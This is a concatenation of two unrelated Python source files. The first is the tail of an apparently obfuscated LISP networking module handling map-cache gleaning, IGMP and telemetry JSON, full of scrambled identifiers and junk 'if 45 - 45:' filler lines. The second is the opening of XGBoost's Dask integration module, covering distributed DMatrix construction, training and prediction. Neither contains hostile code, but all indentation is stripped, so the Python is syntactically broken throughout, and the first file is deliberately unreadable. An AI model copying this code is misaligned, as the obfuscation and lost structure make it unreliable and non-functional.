if 45 - 45: I1Ii111 % Ii1I . ooOoO0o
return ( OoOiI1I )
if 99 - 99: I11i - OoOoOO00 % I11i / i1IIi
if 55 - 55: o0oOOo0O0Ooo / ooOoO0o % I1IiiI / I1Ii111
if 30 - 30: I11i % OoOoOO00 * O0
if 32 - 32: iII111i - Oo0Ooo / Oo0Ooo + o0oOOo0O0Ooo + Ii1I + IiII
if 100 - 100: Oo0Ooo + o0oOOo0O0Ooo % Oo0Ooo
if 73 - 73: o0oOOo0O0Ooo + Ii1I
if 62 - 62: OOooOOo
if 91 - 91: iII111i . Ii1I - OoooooooOO / Ii1I / II111iiii - O0
lisp_geid = lisp_address ( LISP_AFI_IPV4 , "" , 32 , 0 )
if 67 - 67: oO0o * i11iIiiIii / I1ii11iIi11i . I11i % OOooOOo
def lisp_glean_map_cache ( seid , rloc , encap_port , igmp ) :
if 75 - 75: ooOoO0o - OOooOOo
if 97 - 97: i11iIiiIii / I11i % II111iiii
if 20 - 20: I1Ii111 + OoooooooOO . o0oOOo0O0Ooo - ooOoO0o
if 61 - 61: i11iIiiIii + OoooooooOO
if 7 - 7: I1IiiI * OoO0O00 * I1IiiI
if 50 - 50: I1ii11iIi11i
oOOOOO00O0oo = True
I11iiI1III = lisp_map_cache . lookup_cache ( seid , True )
if ( I11iiI1III and len ( I11iiI1III . rloc_set ) != 0 ) :
I11iiI1III . last_refresh_time = lisp_get_timestamp ( )
if 92 - 92: I1ii11iIi11i * o0oOOo0O0Ooo - OoooooooOO * OOooOOo . IiII - o0oOOo0O0Ooo
Iiii1111iIIii = I11iiI1III . rloc_set [ 0 ]
Ii1i1 = Iiii1111iIIii . rloc
OO0O00Ii1iIiIi11 = Iiii1111iIIii . translated_port
oOOOOO00O0oo = ( Ii1i1 . is_exact_match ( rloc ) == False or
OO0O00Ii1iIiIi11 != encap_port )
if 35 - 35: i1IIi
if ( oOOOOO00O0oo ) :
oO0ooOOO = green ( seid . print_address ( ) , False )
iiiI1I = red ( rloc . print_address_no_iid ( ) + ":" + str ( encap_port ) , False )
lprint ( "Change gleaned EID {} to RLOC {}" . format ( oO0ooOOO , iiiI1I ) )
Iiii1111iIIii . delete_from_rloc_probe_list ( I11iiI1III . eid , I11iiI1III . group )
lisp_change_gleaned_multicast ( seid , rloc , encap_port )
if 58 - 58: Ii1I - IiII / ooOoO0o % o0oOOo0O0Ooo + I1ii11iIi11i
else :
I11iiI1III = lisp_mapping ( "" , "" , [ ] )
I11iiI1III . eid . copy_address ( seid )
I11iiI1III . mapping_source . copy_address ( rloc )
I11iiI1III . map_cache_ttl = LISP_GLEAN_TTL
I11iiI1III . gleaned = True
oO0ooOOO = green ( seid . print_address ( ) , False )
iiiI1I = red ( rloc . print_address_no_iid ( ) + ":" + str ( encap_port ) , False )
lprint ( "Add gleaned EID {} to map-cache with RLOC {}" . format ( oO0ooOOO , iiiI1I ) )
I11iiI1III . add_cache ( )
if 89 - 89: IiII / OoooooooOO
if 13 - 13: II111iiii . OOooOOo - O0 * oO0o
if 71 - 71: ooOoO0o % ooOoO0o + o0oOOo0O0Ooo + iII111i / OoOoOO00
if 27 - 27: I1ii11iIi11i * OoO0O00 - OoO0O00
if 87 - 87: I1IiiI * I11i + iIii1I11I1II1 % i1IIi
if ( oOOOOO00O0oo ) :
OOOoOoo = lisp_rloc ( )
OOOoOoo . store_translated_rloc ( rloc , encap_port )
OOOoOoo . add_to_rloc_probe_list ( I11iiI1III . eid , I11iiI1III . group )
OOOoOoo . priority = 253
OOOoOoo . mpriority = 255
OO00O000OOO = [ OOOoOoo ]
I11iiI1III . rloc_set = OO00O000OOO
I11iiI1III . build_best_rloc_set ( )
if 6 - 6: o0oOOo0O0Ooo
if 94 - 94: I1ii11iIi11i * i11iIiiIii
if 95 - 95: OoooooooOO - II111iiii . I1Ii111
if 97 - 97: i1IIi * iIii1I11I1II1
if 44 - 44: O0 - o0oOOo0O0Ooo - I1Ii111 % O0
if ( igmp == None ) : return
if 31 - 31: i11iIiiIii - I11i
if 91 - 91: I11i - iII111i
if 35 - 35: I1IiiI * I11i + I11i
if 67 - 67: I1ii11iIi11i - I1IiiI + Ii1I * Ii1I + Oo0Ooo
if 41 - 41: i11iIiiIii
lisp_geid . instance_id = seid . instance_id
if 97 - 97: i1IIi / Ii1I / ooOoO0o . Ii1I - ooOoO0o + oO0o
if 27 - 27: OOooOOo % O0
if 96 - 96: OoooooooOO / OOooOOo
if 87 - 87: IiII - OoooooooOO
if 53 - 53: OoOoOO00 + Oo0Ooo
OOo00O = lisp_process_igmp_packet ( igmp )
if ( type ( OOo00O ) == bool ) : return
if 33 - 33: I11i - OOooOOo + Oo0Ooo - iII111i * iII111i
for O0oo0OoO0oo , oo0oOooo0O , oOOOOoOo00OoO in OOo00O :
if ( O0oo0OoO0oo != None ) : continue
if 44 - 44: Oo0Ooo % OoOoOO00 / oO0o
if 34 - 34: II111iiii + Ii1I + OoOoOO00
if 9 - 9: I11i / oO0o * OoO0O00
if 26 - 26: I1IiiI % OOooOOo * OoOoOO00
lisp_geid . store_address ( oo0oOooo0O )
iIiI1III , Oo0OoO00O , ii1I1I1iII = lisp_allow_gleaning ( seid , lisp_geid , rloc )
if ( iIiI1III == False ) : continue
if 14 - 14: I11i * Oo0Ooo . I1Ii111 * Ii1I . i11iIiiIii * I1ii11iIi11i
if ( oOOOOoOo00OoO ) :
lisp_build_gleaned_multicast ( seid , lisp_geid , rloc , encap_port ,
True )
else :
lisp_remove_gleaned_multicast ( seid , lisp_geid )
if 11 - 11: oO0o + oO0o + o0oOOo0O0Ooo / iIii1I11I1II1 / I11i
if 68 - 68: OoooooooOO + i1IIi % I1ii11iIi11i . iII111i
if 69 - 69: ooOoO0o * II111iiii + i11iIiiIii / oO0o + I1Ii111 - OOooOOo
if 84 - 84: O0
if 29 - 29: I11i + o0oOOo0O0Ooo . ooOoO0o * I1Ii111 - o0oOOo0O0Ooo * O0
if 58 - 58: iII111i . oO0o + i11iIiiIii
if 2 - 2: OOooOOo * Ii1I
if 17 - 17: I1ii11iIi11i * O0 / OoOoOO00 + i1IIi
if 71 - 71: oO0o % IiII
if 77 - 77: i1IIi * o0oOOo0O0Ooo - Oo0Ooo / I1Ii111 - Ii1I * IiII
if 51 - 51: OoO0O00 * IiII
if 36 - 36: II111iiii + I11i - O0
def lisp_is_json_telemetry ( json_string ) :
try :
IiI111i1iI1 = json . loads ( json_string )
if ( type ( IiI111i1iI1 ) != dict ) : return ( None )
except :
lprint ( "Could not decode telemetry json: {}" . format ( json_string ) )
return ( None )
if 24 - 24: I1Ii111 / OoOoOO00
if 10 - 10: I11i . OoO0O00 / O0 / oO0o / o0oOOo0O0Ooo / ooOoO0o
if ( "type" not in IiI111i1iI1 ) : return ( None )
if ( "sub-type" not in IiI111i1iI1 ) : return ( None )
if ( IiI111i1iI1 [ "type" ] != "telemetry" ) : return ( None )
if ( IiI111i1iI1 [ "sub-type" ] != "timestamps" ) : return ( None )
return ( IiI111i1iI1 )
if 30 - 30: Oo0Ooo
if 93 - 93: II111iiii - I1IiiI
if 80 - 80: I11i . o0oOOo0O0Ooo % IiII - OoOoOO00 % OOooOOo / OoooooooOO
if 57 - 57: OoooooooOO % o0oOOo0O0Ooo - iIii1I11I1II1 . OoooooooOO
if 42 - 42: o0oOOo0O0Ooo % OoooooooOO * OoO0O00 - o0oOOo0O0Ooo
if 83 - 83: i1IIi . i1IIi * ooOoO0o
if 26 - 26: I1IiiI - IiII
if 99 - 99: IiII * iII111i + i1IIi * I1Ii111
if 88 - 88: o0oOOo0O0Ooo . IiII - Oo0Ooo
if 24 - 24: Oo0Ooo - OOooOOo / Ii1I / II111iiii . Oo0Ooo - Ii1I
if 5 - 5: IiII
if 66 - 66: OoO0O00 . I1ii11iIi11i . OoooooooOO
def lisp_encode_telemetry ( json_string , ii = "?" , io = "?" , ei = "?" , eo = "?" ) :
IiI111i1iI1 = lisp_is_json_telemetry ( json_string )
if ( IiI111i1iI1 == None ) : return ( json_string )
if 21 - 21: I11i / IiII + i1IIi . Oo0Ooo % II111iiii
if ( IiI111i1iI1 [ "itr-in" ] == "?" ) : IiI111i1iI1 [ "itr-in" ] = ii
if ( IiI111i1iI1 [ "itr-out" ] == "?" ) : IiI111i1iI1 [ "itr-out" ] = io
if ( IiI111i1iI1 [ "etr-in" ] == "?" ) : IiI111i1iI1 [ "etr-in" ] = ei
if ( IiI111i1iI1 [ "etr-out" ] == "?" ) : IiI111i1iI1 [ "etr-out" ] = eo
json_string = json . dumps ( IiI111i1iI1 )
return ( json_string )
if 8 - 8: oO0o / iIii1I11I1II1 + OoooooooOO
if 11 - 11: OOooOOo . O0 + IiII . i1IIi
if 81 - 81: OoO0O00 - I11i - OoO0O00 + oO0o
if 20 - 20: OoooooooOO - Oo0Ooo + I1Ii111 + OoooooooOO
if 66 - 66: I1ii11iIi11i / oO0o % IiII + II111iiii % iII111i
if 54 - 54: iII111i * O0 / I1IiiI % Ii1I
if 12 - 12: IiII % I1IiiI - o0oOOo0O0Ooo - I1ii11iIi11i - i11iIiiIii * i1IIi
if 96 - 96: II111iiii % o0oOOo0O0Ooo % oO0o * ooOoO0o
if 79 - 79: iII111i
if 74 - 74: Oo0Ooo - IiII - iII111i - IiII / IiII
if 75 - 75: I11i - i11iIiiIii % O0 - O0 % O0
if 93 - 93: ooOoO0o + iIii1I11I1II1
def lisp_decode_telemetry ( json_string ) :
IiI111i1iI1 = lisp_is_json_telemetry ( json_string )
if ( IiI111i1iI1 == None ) : return ( { } )
return ( IiI111i1iI1 )
if 27 - 27: i1IIi * i11iIiiIii - OoOoOO00 * Ii1I . IiII + iII111i
if 25 - 25: I1ii11iIi11i % o0oOOo0O0Ooo - OoO0O00
if 28 - 28: oO0o
if 8 - 8: I11i / OoooooooOO % OoooooooOO . Oo0Ooo
if 30 - 30: iII111i
if 25 - 25: I11i % i1IIi + OOooOOo * Ii1I . i1IIi
if 81 - 81: I11i % OoOoOO00 . Ii1I
if 82 - 82: i1IIi / II111iiii
if 40 - 40: II111iiii - I1Ii111 + Oo0Ooo / IiII
def lisp_telemetry_configured ( ) :
if ( "telemetry" not in lisp_json_list ) : return ( None )
if 15 - 15: I1Ii111 + ooOoO0o / II111iiii . OoOoOO00 - I1Ii111
OoOo00OO0o00 = lisp_json_list [ "telemetry" ] . json_string
if ( lisp_is_json_telemetry ( OoOo00OO0o00 ) == None ) : return ( None )
if 59 - 59: Ii1I * iIii1I11I1II1 - iIii1I11I1II1 % I1Ii111 - OoO0O00 / I1IiiI
return ( OoOo00OO0o00 )
if 89 - 89: I1Ii111 . OoO0O00
if 52 - 52: OoO0O00 - iIii1I11I1II1
if 52 - 52: OOooOOo + I1IiiI * Ii1I % OoooooooOO / I1Ii111
if 74 - 74: iIii1I11I1II1
if 82 - 82: OOooOOo
if 64 - 64: II111iiii
if 48 - 48: iII111i + i11iIiiIii * I1IiiI % OoOoOO00
def lisp_mr_or_pubsub ( action ) :
return ( action in [ LISP_SEND_MAP_REQUEST_ACTION , LISP_SEND_PUBSUB_ACTION ] )
if 49 - 49: Oo0Ooo
if 67 - 67: iIii1I11I1II1 + I1Ii111 / I1Ii111 % I11i + I1Ii111
if 7 - 7: iIii1I11I1II1 . Oo0Ooo / OoO0O00 / OoOoOO00
# dd678faae9ac167bc83abf78e5cb2f3f0688d3a3
|
dask.py
|
# pylint: disable=too-many-arguments, too-many-locals
# pylint: disable=missing-class-docstring, invalid-name
# pylint: disable=too-many-lines
"""Dask extensions for distributed training. See
https://xgboost.readthedocs.io/en/latest/tutorials/dask.html for simple
tutorial. Also xgboost/demo/dask for some examples.
There are two sets of APIs in this module, one is the functional API including
``train`` and ``predict`` methods. Another is stateful Scikit-Learner wrapper
inherited from single-node Scikit-Learn interface.
The implementation is heavily influenced by dask_xgboost:
https://github.com/dask/dask-xgboost
"""
import platform
import logging
from collections import defaultdict
from collections.abc import Sequence
from threading import Thread
import numpy
from . import rabit
from .compat import DASK_INSTALLED
from .compat import distributed_get_worker, distributed_wait, distributed_comm
from .compat import da, dd, delayed, get_client
from .compat import sparse, scipy_sparse
from .compat import PANDAS_INSTALLED, DataFrame, Series, pandas_concat
from .compat import CUDF_concat
from .compat import lazy_isinstance
from .core import DMatrix, DeviceQuantileDMatrix, Booster, _expect, DataIter
from .training import train as worker_train
from .tracker import RabitTracker
from .sklearn import XGBModel, XGBRegressorBase, XGBClassifierBase
from .sklearn import xgboost_model_doc
try:
from distributed import Client
except ImportError:
Client = None
# Current status is considered as initial support, many features are
# not properly supported yet.
#
# TODOs:
# - Callback.
# - Label encoding.
# - CV
# - Ranking
#
# Note for developers:
# As of writing asyncio is still a new feature of Python and in depth
# documentation is rare. Best examples of various asyncio tricks are in dask
# (luckily). Classes like Client, Worker are awaitable. Some general rules
# for the implementation here:
# - Synchronous world is different from asynchronous one, and they don't
# mix well.
# - Write everything with async, then use distributed Client sync function
# to do the switch.
LOGGER = logging.getLogger('[xgboost.dask]')
def _start_tracker(host, n_workers):
"""Start Rabit tracker """
env = {'DMLC_NUM_WORKER': n_workers}
rabit_context = RabitTracker(hostIP=host, nslave=n_workers)
env.update(rabit_context.slave_envs())
rabit_context.start(n_workers)
thread = Thread(target=rabit_context.join)
thread.daemon = True
thread.start()
return env
def _assert_dask_support():
if not DASK_INSTALLED:
raise ImportError(
'Dask needs to be installed in order to use this module')
if platform.system() == 'Windows':
msg = 'Windows is not officially supported for dask/xgboost,'
msg += ' contribution are welcomed.'
LOGGER.warning(msg)
class RabitContext:
'''A context controling rabit initialization and finalization.'''
def __init__(self, args):
self.args = args
worker = distributed_get_worker()
self.args.append(
('DMLC_TASK_ID=[xgboost.dask]:' + str(worker.address)).encode())
def __enter__(self):
rabit.init(self.args)
LOGGER.debug('-------------- rabit say hello ------------------')
def __exit__(self, *args):
rabit.finalize()
LOGGER.debug('--------------- rabit say bye ------------------')
def concat(value): # pylint: disable=too-many-return-statements
'''To be replaced with dask builtin.'''
if isinstance(value[0], numpy.ndarray):
return numpy.concatenate(value, axis=0)
if scipy_sparse and isinstance(value[0], scipy_sparse.spmatrix):
return scipy_sparse.vstack(value, format='csr')
if sparse and isinstance(value[0], sparse.SparseArray):
return sparse.concatenate(value, axis=0)
if PANDAS_INSTALLED and isinstance(value[0], (DataFrame, Series)):
return pandas_concat(value, axis=0)
if lazy_isinstance(value[0], 'cudf.core.dataframe', 'DataFrame') or \
lazy_isinstance(value[0], 'cudf.core.series', 'Series'):
return CUDF_concat(value, axis=0)
if lazy_isinstance(value[0], 'cupy.core.core', 'ndarray'):
import cupy # pylint: disable=import-error
# pylint: disable=c-extension-no-member,no-member
d = cupy.cuda.runtime.getDevice()
for v in value:
d_v = v.device.id
assert d_v == d, 'Concatenating arrays on different devices.'
return cupy.concatenate(value, axis=0)
return dd.multi.concat(list(value), axis=0)
def _xgb_get_client(client):
'''Simple wrapper around testing None.'''
if not isinstance(client, (type(get_client()), type(None))):
raise TypeError(
_expect([type(get_client()), type(None)], type(client)))
ret = get_client() if client is None else client
return ret
def _get_client_workers(client):
workers = client.scheduler_info()['workers']
return workers
# From the implementation point of view, DaskDMatrix complicates a lots of
# things. A large portion of the code base is about syncing and extracting
# stuffs from DaskDMatrix. But having an independent data structure gives us a
# chance to perform some specialized optimizations, like building histogram
# index directly.
class DaskDMatrix:
# pylint: disable=missing-docstring, too-many-instance-attributes
'''DMatrix holding on references to Dask DataFrame or Dask Array. Constructing
a `DaskDMatrix` forces all lazy computation to be carried out. Wait for
the input data explicitly if you want to see actual computation of
constructing `DaskDMatrix`.
.. note::
DaskDMatrix does not repartition or move data between workers. It's
the caller's responsibility to balance the data.
.. versionadded:: 1.0.0
Parameters
----------
client: dask.distributed.Client
Specify the dask client used for training. Use default client
returned from dask if it's set to None.
data : dask.array.Array/dask.dataframe.DataFrame
data source of DMatrix.
label: dask.array.Array/dask.dataframe.DataFrame
label used for trainin.
missing : float, optional
Value in the input data (e.g. `numpy.ndarray`) which needs
to be present as a missing value. If None, defaults to np.nan.
weight : dask.array.Array/dask.dataframe.DataFrame
Weight for each instance.
feature_names : list, optional
Set names for features.
feature_types : list, optional
Set types for features
'''
def __init__(self,
client,
data,
label=None,
missing=None,
weight=None,
feature_names=None,
feature_types=None):
_assert_dask_support()
client: Client = _xgb_get_client(client)
self.feature_names = feature_names
self.feature_types = feature_types
self.missing = missing
if len(data.shape) != 2:
raise ValueError(
'Expecting 2 dimensional input, got: {shape}'.format(
shape=data.shape))
if not isinstance(data, (dd.DataFrame, da.Array)):
raise TypeError(_expect((dd.DataFrame, da.Array), type(data)))
if not isinstance(label, (dd.DataFrame, da.Array, dd.Series,
type(None))):
raise TypeError(
_expect((dd.DataFrame, da.Array, dd.Series), type(label)))
self.worker_map = None
self.has_label = label is not None
self.has_weights = weight is not None
self.is_quantile = False
self._init = client.sync(self.map_local_data,
client, data, label, weight)
def __await__(self):
return self._init.__await__()
async def map_local_data(self, client, data, label=None, weights=None):
'''Obtain references to local data.'''
def inconsistent(left, left_name, right, right_name):
msg = 'Partitions between {a_name} and {b_name} are not ' \
'consistent: {a_len} != {b_len}. ' \
'Please try to repartition/rechunk your data.'.format(
a_name=left_name, b_name=right_name, a_len=len(left),
b_len=len(right)
)
return msg
def check_columns(parts):
# x is required to be 2 dim in __init__
assert parts.ndim == 1 or parts.shape[1], 'Data should be' \
' partitioned by row. To avoid this specify the number' \
' of columns for your dask Array explicitly. e.g.' \
' chunks=(partition_size, X.shape[1])'
data = data.persist()
if label is not None:
label = label.persist()
if weights is not None:
weights = weights.persist()
# Breaking data into partitions, a trick borrowed from dask_xgboost.
# `to_delayed` downgrades high-level objects into numpy or pandas
# equivalents.
X_parts = data.to_delayed()
if isinstance(X_parts, numpy.ndarray):
check_columns(X_parts)
X_parts = X_parts.flatten().tolist()
if label is not None:
y_parts = label.to_delayed()
if isinstance(y_parts, numpy.ndarray):
check_columns(y_parts)
y_parts = y_parts.flatten().tolist()
if weights is not None:
w_parts = weights.to_delayed()
if isinstance(w_parts, numpy.ndarray):
check_columns(w_parts)
w_parts = w_parts.flatten().tolist()
parts = [X_parts]
if label is not None:
assert len(X_parts) == len(
y_parts), inconsistent(X_parts, 'X', y_parts, 'labels')
parts.append(y_parts)
if weights is not None:
assert len(X_parts) == len(
w_parts), inconsistent(X_parts, 'X', w_parts, 'weights')
parts.append(w_parts)
parts = list(map(delayed, zip(*parts)))
parts = client.compute(parts)
await distributed_wait(parts) # async wait for parts to be computed
for part in parts:
assert part.status == 'finished'
self.partition_order = {}
for i, part in enumerate(parts):
self.partition_order[part.key] = i
key_to_partition = {part.key: part for part in parts}
who_has = await client.scheduler.who_has(
keys=[part.key for part in parts])
worker_map = defaultdict(list)
for key, workers in who_has.items():
worker_map[next(iter(workers))].append(key_to_partition[key])
self.worker_map = worker_map
return self
def create_fn_args(self):
'''Create a dictionary of objects that can be pickled for function
arguments.
'''
return {'feature_names': self.feature_names,
'feature_types': self.feature_types,
'has_label': self.has_label,
'has_weights': self.has_weights,
'missing': self.missing,
'worker_map': self.worker_map,
'is_quantile': self.is_quantile}
def _get_worker_x_ordered(worker_map, partition_order, worker):
list_of_parts = worker_map[worker.address]
client = get_client()
list_of_parts_value = client.gather(list_of_parts)
result = []
for i, part in enumerate(list_of_parts):
result.append((list_of_parts_value[i][0],
partition_order[part.key]))
return result
def _get_worker_parts(has_label, has_weights, worker_map, worker):
'''Get mapped parts of data in each worker from DaskDMatrix.'''
list_of_parts = worker_map[worker.address]
assert list_of_parts, 'data in ' + worker.address + ' was moved.'
assert isinstance(list_of_parts, list)
# `_get_worker_parts` is launched inside worker. In dask side
# this should be equal to `worker._get_client`.
client = get_client()
list_of_parts = client.gather(list_of_parts)
if has_label:
if has_weights:
data, labels, weights = zip(*list_of_parts)
else:
data, labels = zip(*list_of_parts)
weights = None
else:
data = [d[0] for d in list_of_parts]
labels = None
weights = None
return data, labels, weights
class DaskPartitionIter(DataIter): # pylint: disable=R0902
'''A data iterator for `DaskDeviceQuantileDMatrix`.
'''
def __init__(self, data, label=None, weight=None, base_margin=None,
label_lower_bound=None, label_upper_bound=None,
feature_names=None, feature_types=None):
self._data = data
self._labels = label
self._weights = weight
self._base_margin = base_margin
self._label_lower_bound = label_lower_bound
self._label_upper_bound = label_upper_bound
self._feature_names = feature_names
self._feature_types = feature_types
assert isinstance(self._data, Sequence)
types = (Sequence, type(None))
assert isinstance(self._labels, types)
assert isinstance(self._weights, types)
assert isinstance(self._base_margin, types)
assert isinstance(self._label_lower_bound, types)
assert isinstance(self._label_upper_bound, types)
self._iter = 0 # set iterator to 0
super().__init__()
def data(self):
'''Utility function for obtaining current batch of data.'''
return self._data[self._iter]
def labels(self):
'''Utility function for obtaining current batch of label.'''
if self._labels is not None:
return self._labels[self._iter]
return None
def weights(self):
'''Utility function for obtaining current batch of label.'''
if self._weights is not None:
return self._weights[self._iter]
return None
def base_margins(self):
'''Utility function for obtaining current batch of base_margin.'''
if self._base_margin is not None:
return self._base_margin[self._iter]
return None
def label_lower_bounds(self):
'''Utility function for obtaining current batch of label_lower_bound.
'''
if self._label_lower_bound is not None:
return self._label_lower_bound[self._iter]
return None
def label_upper_bounds(self):
'''Utility function for obtaining current batch of label_upper_bound.
'''
if self._label_upper_bound is not None:
return self._label_upper_bound[self._iter]
return None
def reset(self):
'''Reset the iterator'''
self._iter = 0
def next(self, input_data):
'''Yield next batch of data'''
if self._iter == len(self._data):
# Return 0 when there's no more batch.
return 0
if self._feature_names:
feature_names = self._feature_names
else:
if hasattr(self.data(), 'columns'):
feature_names = self.data().columns.format()
else:
feature_names = None
input_data(data=self.data(), label=self.labels(),
weight=self.weights(), group=None,
label_lower_bound=self.label_lower_bounds(),
label_upper_bound=self.label_upper_bounds(),
feature_names=feature_names,
feature_types=self._feature_types)
self._iter += 1
return 1
class DaskDeviceQuantileDMatrix(DaskDMatrix):
'''Specialized data type for `gpu_hist` tree method. This class is
used to reduce the memory usage by eliminating data copies.
Internally the data is merged by weighted GK sketching. So the
number of partitions from dask may affect training accuracy as GK
generates error for each merge.
.. versionadded:: 1.2.0
Parameters
----------
max_bin: Number of bins for histogram construction.
'''
def __init__(self, client, data, label=None, weight=None,
missing=None,
feature_names=None,
feature_types=None,
max_bin=256):
super().__init__(client=client, data=data, label=label, weight=weight,
missing=missing,
feature_names=feature_names,
feature_types=feature_types)
self.max_bin = max_bin
self.is_quantile = True
def create_fn_args(self):
args = super().create_fn_args()
args['max_bin'] = self.max_bin
return args
def _create_device_quantile_dmatrix(feature_names, feature_types,
has_label,
has_weights, missing, worker_map,
max_bin):
worker = distributed_get_worker()
if worker.address not in set(worker_map.keys()):
msg = 'worker {address} has an empty DMatrix. ' \
'All workers associated with this DMatrix: {workers}'.format(
address=worker.address,
workers=set(worker_map.keys()))
LOGGER.warning(msg)
import cupy # pylint: disable=import-error
d = DeviceQuantileDMatrix(cupy.zeros((0, 0)),
feature_names=feature_names,
feature_types=feature_types,
max_bin=max_bin)
return d
data, labels, weights = _get_worker_parts(has_label, has_weights,
worker_map, worker)
it = DaskPartitionIter(data=data, label=labels, weight=weights)
dmatrix = DeviceQuantileDMatrix(it,
missing=missing,
feature_names=feature_names,
feature_types=feature_types,
nthread=worker.nthreads,
max_bin=max_bin)
return dmatrix
def _create_dmatrix(feature_names, feature_types, has_label,
has_weights, missing, worker_map):
'''Get data that local to worker from DaskDMatrix.
Returns
-------
A DMatrix object.
'''
worker = distributed_get_worker()
if worker.address not in set(worker_map.keys()):
msg = 'worker {address} has an empty DMatrix. ' \
'All workers associated with this DMatrix: {workers}'.format(
address=worker.address,
workers=set(worker_map.keys()))
LOGGER.warning(msg)
d = DMatrix(numpy.empty((0, 0)),
feature_names=feature_names,
feature_types=feature_types)
return d
data, labels, weights = _get_worker_parts(has_label, has_weights,
worker_map, worker)
data = concat(data)
if has_label:
labels = concat(labels)
else:
labels = None
if has_weights:
weights = concat(weights)
else:
weights = None
dmatrix = DMatrix(data,
labels,
weight=weights,
missing=missing,
feature_names=feature_names,
feature_types=feature_types,
nthread=worker.nthreads)
return dmatrix
def _dmatrix_from_worker_map(is_quantile, **kwargs):
if is_quantile:
return _create_device_quantile_dmatrix(**kwargs)
return _create_dmatrix(**kwargs)
async def _get_rabit_args(worker_map, client: Client):
'''Get rabit context arguments from data distribution in DaskDMatrix.'''
host = distributed_comm.get_address_host(client.scheduler.address)
env = await client.run_on_scheduler(
_start_tracker, host.strip('/:'), len(worker_map))
rabit_args = [('%s=%s' % item).encode() for item in env.items()]
return rabit_args
# train and predict methods are supposed to be "functional", which meets the
# dask paradigm. But as a side effect, the `evals_result` in single-node API
# is no longer supported since it mutates the input parameter, and it's not
# intuitive to sync the mutation result. Therefore, a dictionary containing
# evaluation history is instead returned.
async def _train_async(client, params, dtrain: DaskDMatrix,
*args, evals=(), **kwargs):
_assert_dask_support()
client: Client = _xgb_get_client(client)
if 'evals_result' in kwargs.keys():
raise ValueError(
'evals_result is not supported in dask interface.',
'The evaluation history is returned as result of training.')
workers = list(_get_client_workers(client).keys())
rabit_args = await _get_rabit_args(workers, client)
def dispatched_train(worker_addr, dtrain_ref, evals_ref):
'''Perform training on a single worker. A local function prevents pickling.
'''
LOGGER.info('Training on %s', str(worker_addr))
worker = distributed_get_worker()
with RabitContext(rabit_args):
local_dtrain = _dmatrix_from_worker_map(**dtrain_ref)
local_evals = []
if evals_ref:
for ref, name in evals_ref:
if ref['worker_map'] == dtrain_ref['worker_map']:
local_evals.append((local_dtrain, name))
continue
local_evals.append((_dmatrix_from_worker_map(**ref), name))
local_history = {}
local_param = params.copy() # just to be consistent
msg = 'Overriding `nthreads` defined in dask worker.'
if 'nthread' in local_param.keys() and \
local_param['nthread'] is not None and \
local_param['nthread'] != worker.nthreads:
msg += '`nthread` is specified. ' + msg
LOGGER.warning(msg)
elif 'n_jobs' in local_param.keys() and \
local_param['n_jobs'] is not None and \
local_param['n_jobs'] != worker.nthreads:
msg = '`n_jobs` is specified. ' + msg
LOGGER.warning(msg)
else:
local_param['nthread'] = worker.nthreads
bst = worker_train(params=local_param,
dtrain=local_dtrain,
*args,
evals_result=local_history,
evals=local_evals,
**kwargs)
ret = {'booster': bst, 'history': local_history}
if local_dtrain.num_row() == 0:
ret = None
return ret
if evals:
evals = [(e.create_fn_args(), name) for e, name in evals]
futures = client.map(dispatched_train,
workers,
[dtrain.create_fn_args()] * len(workers),
[evals] * len(workers),
pure=False,
workers=workers)
results = await client.gather(futures)
return list(filter(lambda ret: ret is not None, results))[0]
def train(client, params, dtrain, *args, evals=(), **kwargs):
'''Train XGBoost model.
.. versionadded:: 1.0.0
Parameters
----------
client: dask.distributed.Client
Specify the dask client used for training. Use default client
returned from dask if it's set to None.
\\*\\*kwargs:
Other parameters are the same as `xgboost.train` except for
`evals_result`, which is returned as part of function return value
instead of argument.
Returns
-------
results: dict
A dictionary containing trained booster and evaluation history.
`history` field is the same as `eval_result` from `xgboost.train`.
.. code-block:: python
{'booster': xgboost.Booster,
'history': {'train': {'logloss': ['0.48253', '0.35953']},
'eval': {'logloss': ['0.480385', '0.357756']}}}
'''
_assert_dask_support()
client = _xgb_get_client(client)
return client.sync(_train_async, client, params,
dtrain=dtrain, *args, evals=evals, **kwargs)
async def _direct_predict_impl(client, data, predict_fn):
if isinstance(data, da.Array):
predictions = await client.submit(
da.map_blocks,
predict_fn, data, False, drop_axis=1,
dtype=numpy.float32
).result()
return predictions
if isinstance(data, dd.DataFrame):
predictions = await client.submit(
dd.map_partitions,
predict_fn, data, True,
meta=dd.utils.make_meta({'prediction': 'f4'})
).result()
return predictions.iloc[:, 0]
raise TypeError('data of type: ' + str(type(data)) +
' is not supported by direct prediction')
# pylint: disable=too-many-statements
async def _predict_async(client: Client, model, data, *args,
missing=numpy.nan):
if isinstance(model, Booster):
booster = model
elif isinstance(model, dict):
booster = model['booster']
else:
raise TypeError(_expect([Booster, dict], type(model)))
if not isinstance(data, (DaskDMatrix, da.Array, dd.DataFrame)):
raise TypeError(_expect([DaskDMatrix, da.Array, dd.DataFrame],
type(data)))
def mapped_predict(partition, is_df):
worker = distributed_get_worker()
booster.set_param({'nthread': worker.nthreads})
m = DMatrix(partition, missing=missing, nthread=worker.nthreads)
predt = booster.predict(m, *args, validate_features=False)
if is_df:
if lazy_isinstance(partition, 'cudf', 'core.dataframe.DataFrame'):
import cudf # pylint: disable=import-error
predt = cudf.DataFrame(predt, columns=['prediction'])
else:
predt = DataFrame(predt, columns=['prediction'])
return predt
# Predict on dask collection directly.
if isinstance(data, (da.Array, dd.DataFrame)):
return await _direct_predict_impl(client, data, mapped_predict)
# Prediction on dask DMatrix.
worker_map = data.worker_map
partition_order = data.partition_order
feature_names = data.feature_names
feature_types = data.feature_types
missing = data.missing
def dispatched_predict(worker_id):
'''Perform prediction on each worker.'''
LOGGER.info('Predicting on %d', worker_id)
worker = distributed_get_worker()
list_of_parts = _get_worker_x_ordered(worker_map, partition_order,
worker)
predictions = []
booster.set_param({'nthread': worker.nthreads})
for part, order in list_of_parts:
local_x = DMatrix(part, feature_names=feature_names,
feature_types=feature_types,
missing=missing, nthread=worker.nthreads)
predt = booster.predict(data=local_x,
validate_features=local_x.num_row() != 0,
*args)
columns = 1 if len(predt.shape) == 1 else predt.shape[1]
ret = ((delayed(predt), columns), order)
predictions.append(ret)
return predictions
def dispatched_get_shape(worker_id):
'''Get shape of data in each worker.'''
LOGGER.info('Get shape on %d', worker_id)
worker = distributed_get_worker()
list_of_parts = _get_worker_x_ordered(worker_map,
partition_order, worker)
shapes = [(part.shape, order) for part, order in list_of_parts]
return shapes
async def map_function(func):
'''Run function for each part of the data.'''
futures = []
for wid in range(len(worker_map)):
